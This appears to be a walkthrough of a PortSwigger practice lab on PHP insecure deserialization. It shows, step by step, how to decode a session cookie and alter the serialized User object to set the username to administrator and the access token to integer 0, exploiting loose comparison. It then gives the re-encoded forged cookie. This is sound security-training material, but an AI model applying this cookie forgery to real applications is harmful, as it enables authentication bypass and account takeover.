# Modifying serialized data types

[Level description](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-modifying-serialized-data-types) - Practitioner


## The hack

The main vulnerability of this level comes from the fact that `0 == 'any_string_such_as_password_or_secrets'` is true.

Turn the `access_token` into an integer type with value `0`.


## Walk through

1. Login as `wiener`

2. Bring up the dev console and switch to the `Application` tab.
Identify the `session` cookie

3. The session cookie contains a base64 encoded string (url decoded)

    ```
    Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJ3b3RkcXIxbjB6b2I0aW9mNmh5eWpncWdjMTFsazd1OSI7fQ==
    ```

4. Perform a base64 decode on the string

    ```
    O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"wotdqr1n0zob4iof6hyyjgqgc11lk7u9";}
    ```

5. Modify the string to

    ```
    O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}
    ```

6. Perform a base64 encode on the modified string

    ```
    Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjEzOiJhZG1pbmlzdHJhdG9yIjtzOjEyOiJhY2Nlc3NfdG9rZW4iO2k6MDt9
    ```

7. Use the value in the `session` cookie. It now has admin power.

8. *Delete carlos*
